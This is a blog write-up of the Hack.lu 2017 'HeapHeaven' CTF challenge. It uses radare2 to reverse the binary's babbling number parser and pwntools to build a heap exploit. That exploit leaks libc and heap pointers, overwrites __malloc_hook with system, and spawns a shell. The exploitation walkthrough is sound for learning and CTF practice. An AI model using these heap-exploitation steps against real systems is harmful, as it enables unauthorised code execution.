sábado, 21 de octubre de 2017

Hack.lu - HeapHeaven write-up with radare2 and pwntools (ret2libc)

Intro

In the quest to do heap exploits, learning radare2 and the like, I got myself hooked into a CTF that caught my attention because of it having many exploitation challenges. This was the Hack.lu CTF:
Hack.lu challenges by FluxFingers
You can see from that list the Pwn category that there are a few ones so I tried not to overkill myself with difficulty and go for the easiest Heap one, HeapHeaven. As much as I wanted to try the HouseOfScepticism because of the resemblance with the Malloc Malleficarum techniques, when opening it on radare2, it looked quite a bit daunting: no symbols, tons of functions here and there and my inexperience on reading assembly. Another goal for this post is to make some kind of introduction to the usage of radare2. It's quite a good tool with tons of utilities inside such as ROP, search for strings, visual graphs, etc.

The analysis

heaps and pieces

For this challenge we are given (again) the libc.so.6 along the binary. If this is a good giveaway that we will have to do some jump to libc's functions to gain code execution. The binary itself is just an:

HeapHeaven: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, 
interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, 
BuildID[sha1]=617e9a6742b6537d6868f2f8355d64bea4316a99, not stripped

Cool! It's not stripped. This means that we have all the debugging symbols. First thing I did was throwing it into radare2 and check the functions from the menu we are presented with:
HeapHeaven menu

We can see that the functions should be something like "whaa!", "mommy?", etc.

Firing up the radar

We fire up radare2 against the HeapHeaven file like so:
$: radare2 HeapHeaven -AA
This will open the file and do an extensive analysis of it. For a quicker but less extensive analysis, we can just put one "A". Once the analysis is complete, we can head to the var code analysis menu by writing the command vv and pressing enter. If you haven't ever used radare2, you are wondering if all the commands are going to be like "aa" "vv" "cc". Well...

radare2 trolling

After typing in vv we are presented with the whole lot of functions resolved by radare2 due to the file not being stripped. Yay!
Non-stripped symbols on radare2

By inspecting the first function from the menu, namely "whaa!", we see a function parsing a number and then a call to malloc. Our intuition is telling us that this function will serve to allocate chunks of whichever size we specify and that, the other functions, will be doing all other heap manipulation. To prove this inside radare2, we browse with the arrow keys to the function we want and then press g to seek to that function position. Then press V (shift + "V") to go to the visual graph representation.
whaa! function representation
Watch out for the differences here vs x86 (32 bit). As we can see, the arguments aren't pushed to the stack like we are used to see on x86. On x86_64 we can see that the most common way is to pass the arguments in the registers, especially the RDI register. Something that doesn't change is how functions return their values, this is, into the RAX/EAX register. I am going to spoil the get_num function a bit and say that, it is actually nor parsing a number. Let's see it in radare2. Again, seek to the function and press capital V:
 DIsassembly of get_num
It is clearly seen that the function is trying to read, through the scanf function, the format %255s and it will get stored on the argument pointed by the RAX register. In radare2, it's shown as local_110h which is then passed to parse_num.

Zoom out of parse_num function.

Here, thanks to the blue arrows that radare2 describes, we can observe that most likely there is some kind of loop logic happening. Since it is parsing a "number" and previously a string was scanf'ed, it would not be a bad assumption to think that it's parsing our string.

Prologue of parse_num function.
Indeed, the string is passed into RDI is stored in a local variable local_18h. This is afterwards compared against certain bytes and the counter (local_ch) of the loop is incremented by 2. The operation done inside the loop is actually, "binary adding" through bitshifting with the shl opcode. Finally, the resulting operation is stored in another variable to be returned into RAX (local_8h).

Function parse_num comparing bytes.
I spent some time "deciphering" what this code was doing and reading about opcodes. If we watch closely, both are doing almost the same. The only difference is that the second is increasing by one the counter (rax + 1), and then accessing the byte to that offset of the array (mov rax, qword [local_18h]; add rax, rdx; movzx eax, byte [rax]) to compare it against he byte 0x69 (letter "i"). Something that would help us in this point is, renaming the variables to something more user friendly. In radare2, we can do this by seeking to the offset of the function we want to with:

[0x00000b8d]> s sym.parse_num 
[0x000009ca]> afvn local_ch counter_int
[0x000009ca]> afvn local_18h arg_string
[0x000009ca]> afvn local_8h result

Second part of parse_num function with renamed variables.

This is now quite clearer, isn't it? Basically, it is being compared against the bytes 0x77, 0x69 and 0x61. If it's 0x77 (letter "w"), it will jump to the next char and check if it's 0x69 or 0x61 (letter "a"). If the next char is "i", it will add one to the result. Else, if the char is "a", it will just increase the counter and keep parsing. See the translation? We are feeding binary numbers as toddlers (regarding FluxFingers) speak, "wi" being 1 and "wa" being 0.

The exploit

Having the following functions:

whaa!: Allocates chunks of a specified size.
mommy?: Reads a string from a specified offset.
<spill>: Writes to an specified offset.
NOM-NOM: Free's a pointer at an specified offset.

Here's what we need to do.
  1. Leak top and heap pointers
  2. Calculate the offset to __malloc_hook
  3. Calculate the offset to system
  4. Write the address of system into __malloc_hook
  5. Call system with "/bin/sh" as an argument

babbling comprehensively

To code the solution I relied heavily on pwntools by Zach Riggle. The library is just great. I started writing a function that will translate an hex number to a comprehensive babbling ("wiwawiwa" like).

...
def translate_baby(size):
    wiwa = ""
    for bit in ("%s" % "{0:b}".format(size)):
        if bit == "1":
            wiwa += "wi"
        else:
            wiwa += "wa"
    return ("%s" % (wiwa+"0"*(254-len(wiwa))))
...

I am padding the string with zeroes to the right. This is because the scanf tries to read %255s and, the loop, won't stop until the counter reaches 0x3f. This would cause trouble because if we don't pad enough chars to the right, the parse_num function will keep reading values from memory and, in case there is another "wiwa" around there, it will mess up our calculations #truestory.

leaking addresses

From the Painless intro to ptmalloc2, we remember that a normal chunk had the following structure:

 +---------------------------------+-+-+-+
 | CHUNK SIZE                      |A|M|P|
 +---------------------------------+-+-+-+ 
 |           FORWARD POINTER(FD)         |
 |            BACK POINTER(BK)           |
 |                                       | 
 |                                       |
 | -  -  -  -  -  -  -  -  -  -  -  -  - |
 |         PREV_SIZE OR USER DATA        |
 +---------------------------------------+

The FD pointer is set to, either the top chunk pointer if it's the only chunk free of that size or, to the next free chunk of the same size if there are more chunks free'd afterwards. Since we can read from a certain offset, we are able to trigger allocations and free's to set  top and FD pointers to then, read those:
...
    # Alocate four chunks so we can avoid coalescing chunks and leak:
    # * Pointer to chunk2 
    # * Pointer to main_arena+88 (av->top)
    allocate_chunk(0x128, io)
    allocate_chunk(0x128, io)
    allocate_chunk(0x128, io)
    allocate_chunk(0x128, io)

    # Now free chunks 2 and 4 in that order so we can access their FD
    # The first free'd chunk's FD will point to main_arena->top
    # The second free'd chunk's FD will point to the second chunk
    free_chunk(0x20, io)
    free_chunk(0x280, io)

    # Read the FD pointers and store them to calculate offsets to libc
    main_arena_leak = read_from(0x20, io)
    print("[+] Main_arena: %#x" % main_arena_leak)
    heap_2nd_chunk = read_from(0x280, io)
    print("[+] 2nd chunk: %#x" % heap_2nd_chunk)
...

I am not going to cover why or where those pointers are set since I think I have covered this matter extensively on previous heap posts (don't be lazy, read them!). However, it's mandatory to explain why we need to free the offset to 0x20 and the offset to 0x280. When the program starts, it triggers a malloc(0x0) which, in turn, reserves 32 bytes (0x20 in hex) in memory. As you may remember, fastchunks only set their FD pointer (fastbins are single linked lists), hence jumping over the first fastchunk and going straight to free the next chunk of size 0x130 in memory (we allocated 0x130-0x8 in order to trigger an effective allocation of 0x130 in memory). This will set its FD and BK pointers to the top chunk in main_arena.
Function parse_num comparing bytes.

Now we free the fourth chunk in order to populate it's FD pointer and make it point to the first free'd chunk. See how the FD pointer is pointing to the previous free'd chunk 0x55cd4bd8020.

Status of the fourth chunk after the second free
We are ready to leak the addresses now. The only thing we need to do is call the menu function "mommy?" and feed it the previous offsets:

...
    # Read the FD pointers and store them to calculate offsets to libc
    main_arena_leak = read_from(0x20, io)
    print("[+] Main_arena: %#x" % main_arena_leak)
    heap_2nd_chunk = read_from(0x280, io)
    print("[+] 2nd chunk: %#x" % heap_2nd_chunk)
...

Return to libc (ret2libc)

After leaking both addresses, one to the heap and another one inside main_arena we have effectively bypassed ASLR. The main_arena is always placed at a fixed relative position from the other functions of the libc library. After all, the heap is implemented inside libc. To obtain the offsets to other functions we can just query inside gdb and then move the offsets depending on the libc we are targeting.

Calculating offsets within gdb
Let's start assigning all of this inside our exploit code:

...
    # Offset calculation
    happa_at = heap_2nd_chunk - 0x10
    malloc_hook_at = main_arena_leak - 0x68
    malloc_hook_offset = malloc_hook_at - happa_at
    libc_system = malloc_hook_at - 0x37f780
...

The variable happa_at is the address of the base of the heap. This is, the first allocated chunk of them all. malloc_hook_at represents the absolute address of the weak pointer __malloc_hook. We are using this hook to calculate offsets instead of the top chunk (there is no special reason for this). Finally, the system symbol is calculated and stored into the libc_system variable. We need happa_at because when using the "<spill>" function, we have to provide as the first argument an offset (not an address!). This offset starts from the base of the heap (namely, happa_at). Then, we provide the string we want to write at that offset. Our goal is to write at __malloc_hook the address of system. There are several techniques like creating fake FILE structures, overwriting malloc hooking functions or going after the dtors. All of this in order to redirect code execution. I chose this one since it's the one I feel is simpler enough and it is so convenient as the function we place in __malloc_hook must take the form of malloc. This means that the function we place in there must take an argument just as malloc, so system fits so well.

wiwapwn

Having in mind that __malloc_hook only gets triggered when an allocation happens and, that the argument to malloc is passed onto __malloc_hook therefore passed onto system. This means that the last malloc we trigger, needs to have a pointer to the string "/bin/sh\x00". We can satisfy this by writing the string to any of the chunks already allocated and then, feed the pointer to that chunk's position. I've chosen the first allocated chunk at offset 0x0, this is, the pointer pointed by happa_at:
...
    # write /bin/sh to the first chunk (pointed by happa_at)
    write_to(0x0, io, "/bin/sh\x00")
...
Since we have calculated the offsets to all that we need let's overwrite the pointer of __malloc_hook with the pointer to system:

...
    # Write the address of system at __malloc_hook
    write_to(malloc_hook_offset, io, p64(libc_system))
...

All we need to do now is trigger __malloc_hook with the address of "/bin/sh\x00" as an argument and interact with the shell:

...
    # Call malloc and feed it the argument of /bin/sh which is at happa_at
    # This will trigger __malloc_hook((char*)"/bin/sh") and give us shell :)
    allocate_chunk(happa_at, io)
...

Exploit for HeapHeaven

Final notes

Note that I didn't need to change any offsets to system's libc to exploit the remote system. This was because the system I used to build the exploit had the same libc. In case we don't have the same libc and we are provided with such what we need to do is, calculate the base of libc through leaked pointers and then, add offsets like such:

Exploit for HeapHeaven
Then, in our code we would have:

libc_system = calculated_libc_base + 0x45390

As a final note. This blog was actually published in my actual company's internal blog that I decided to also make it publish through my blog since I don't think write-ups are SensePost's-blog-worthy.

I hope you enjoyed this write-up as much as I enjoyed solving this challenge! You can get the full HeapHeaven exploit code here.